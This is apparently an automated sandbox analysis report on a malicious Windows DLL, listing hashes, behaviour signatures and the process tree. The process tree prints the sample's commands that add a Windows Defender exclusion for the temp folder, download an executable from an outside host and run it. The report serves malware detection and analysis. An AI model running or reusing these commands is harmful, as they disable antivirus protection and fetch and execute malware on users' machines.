Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15-12-2024 08:17
Static task
static1
Behavioral task
behavioral1
Sample
fccd129f6a5b9d2133d14922a3614f02.dll
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
fccd129f6a5b9d2133d14922a3614f02.dll
Resource
win10v2004-20241007-en
General
-
Target
fccd129f6a5b9d2133d14922a3614f02.dll
-
Size
206KB
-
MD5
fccd129f6a5b9d2133d14922a3614f02
-
SHA1
e814c637e6f0c21f3aa9b43fb92cb161b4d451fc
-
SHA256
4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e
-
SHA512
c1594504053bbe2b061880d1ff69819eca8bdd2bc882b74f415ff8a1515389e32b8d7cd1b931d65b042247fd05df1751a000d6da4219427b74e9cdb0e0e52979
-
SSDEEP
3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2340 powershell.exe 3056 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2340 powershell.exe 3056 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2340 powershell.exe Token: SeDebugPrivilege 3056 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1652 wrote to memory of 2164 1652 rundll32.exe 30 PID 1652 wrote to memory of 2164 1652 rundll32.exe 30 PID 1652 wrote to memory of 2164 1652 rundll32.exe 30 PID 1652 wrote to memory of 2164 1652 rundll32.exe 30 PID 1652 wrote to memory of 2164 1652 rundll32.exe 30 PID 1652 wrote to memory of 2164 1652 rundll32.exe 30 PID 1652 wrote to memory of 2164 1652 rundll32.exe 30 PID 2164 wrote to memory of 2504 2164 rundll32.exe 31 PID 2164 wrote to memory of 2504 2164 rundll32.exe 31 PID 2164 wrote to memory of 2504 2164 rundll32.exe 31 PID 2164 wrote to memory of 2504 2164 rundll32.exe 31 PID 2504 wrote to memory of 2340 2504 cmd.exe 33 PID 2504 wrote to memory of 2340 2504 cmd.exe 33 PID 2504 wrote to memory of 2340 2504 cmd.exe 33 PID 2504 wrote to memory of 2340 2504 cmd.exe 33 PID 2164 wrote to memory of 2824 2164 rundll32.exe 35 PID 2164 wrote to memory of 2824 2164 rundll32.exe 35 PID 2164 wrote to memory of 2824 2164 rundll32.exe 35 PID 2164 wrote to memory of 2824 2164 rundll32.exe 35 PID 2824 wrote to memory of 3056 2824 cmd.exe 37 PID 2824 wrote to memory of 3056 2824 cmd.exe 37 PID 2824 wrote to memory of 3056 2824 cmd.exe 37 PID 2824 wrote to memory of 3056 2824 cmd.exe 37 PID 2164 wrote to memory of 1680 2164 rundll32.exe 38 PID 2164 wrote to memory of 1680 2164 rundll32.exe 38 PID 2164 wrote to memory of 1680 2164 rundll32.exe 38 PID 2164 wrote to memory of 1680 2164 rundll32.exe 38
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c %temp%/eryy65ty.exe3⤵
- System Location Discovery: System Language Discovery
PID:1680
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD558e240ea1ddbd31f4f45f09f72ed516a
SHA15191c30647e215b36330f0341ce831171c639097
SHA25609dee4ff19e52bdef371f7f26bc65d6ad01c3d9d6721ced19e7826f12212ae2a
SHA512b2701737e63e707cd1a3276e259d613ccef6c4dde2a734592e574366fe33526bb2692794d762320a083e29b42627dbf9198391fcac168ba7b14be50529351542